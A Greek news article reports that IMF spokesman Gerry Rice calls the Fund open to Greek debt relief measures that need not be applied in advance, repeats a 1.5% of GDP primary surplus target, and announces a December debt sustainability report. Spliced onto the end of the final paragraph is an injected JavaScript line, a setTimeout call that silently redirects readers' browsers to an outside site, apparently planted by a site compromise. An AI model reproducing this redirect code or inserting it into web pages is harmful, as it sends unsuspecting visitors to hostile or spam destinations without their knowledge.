«Ανοικτό» πλέον το ΔΝΤ στην ελάφρυνση του χρέους

0
7

 

«Πίσω» κάνει το ΔΝΤ στην απαίτησή του για τα «εδώ-και-τώρα» μέτρα ελάφρυνσης του δημοσίου χρέους της Ελλάδας, ως προϋπόθεση για τη συμμετοχή του στο πρόγραμμα προσαρμογής της χώρας.

Σύμφωνα με τον εκπρόσωπο του Τζέρι Ράις: «Είμαστε ανοικτοί να συζητήσουμε τα νέα μέτρα που θα παρουσιαστούν στο επόμενο Eurogroup για την ελάφρυνση του ελληνικού χρέους. Η ελάφρυνση χρέους δεν είναι αναγκαίο να εφαρμοστεί προκαταβολικά, αλλά υπάρχει ανάγκη να εξηγήσουμε στο Εκτελεστικό μας Συμβούλιο το τύπο και το εύρος των μέτρων ελάφρυνσης που θα εφαρμοστούν».

Ο κ. Ράις υπογράμμισε ότι «δουλεύουμε με τις ελληνικές αρχές και τους ευρωπαίους για ένα πρόγραμμα στο οποίο θα βγαίνουν οι αριθμοί», προσθέτοντας ότι το ΔΝΤ ζητά ισχυρές πολιτικές στις μεταρρυθμίσεις και ελάφρυνση χρέους και εξηγώντας ότι όταν αυτά υπάρξουν, τότε το πρόγραμμα θα συζητηθεί στη διοίκηση του Ταμείου.

Κατά τον Τζέρι Ράις, το ΔΝΤ δεν έχει «κλειστό» χρονοδιάγραμμα για την παραπάνω διαδικασία, αλλά επιθυμεί να ολοκληρωθεί σύντομα και επανέλαβε ότι το Ταμείο επιθυμεί ως στόχο του προγράμματος πρωτογενές πλεόνασμα 1,5% του ΑΕΠ, εξηγώντας ότι η μείωση του χρέους μειώνει και την ανάγκη για νέα μέτρα.

«Όταν πάμε στο Δ.Σ. θέλουμε θα έχουμε ένα πρόγραμμα που θα βγαίνουν οι αριθμοί», επανέλαβε.

Ο εκπρόσωπος του ΔΝΤ σημείωσε ότι «η μείωση χρέους δεν χρειάζεται να γίνει προκαταβολικά και μπορεί να γίνει υπό τον όρο ότι η Ελλάδα θα τηρήσει τις υποχρεώσεις της στις μεταρρυθμίσεις», ενώ ανακοίνωσε ότι τον Δεκέμβριο θα παρουσιαστεί η έκθεση για την Ελλάδα, στην οποία θα υπάρχει και η έκθεση για τη βιωσιμότητα του ελληνικού χρέους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here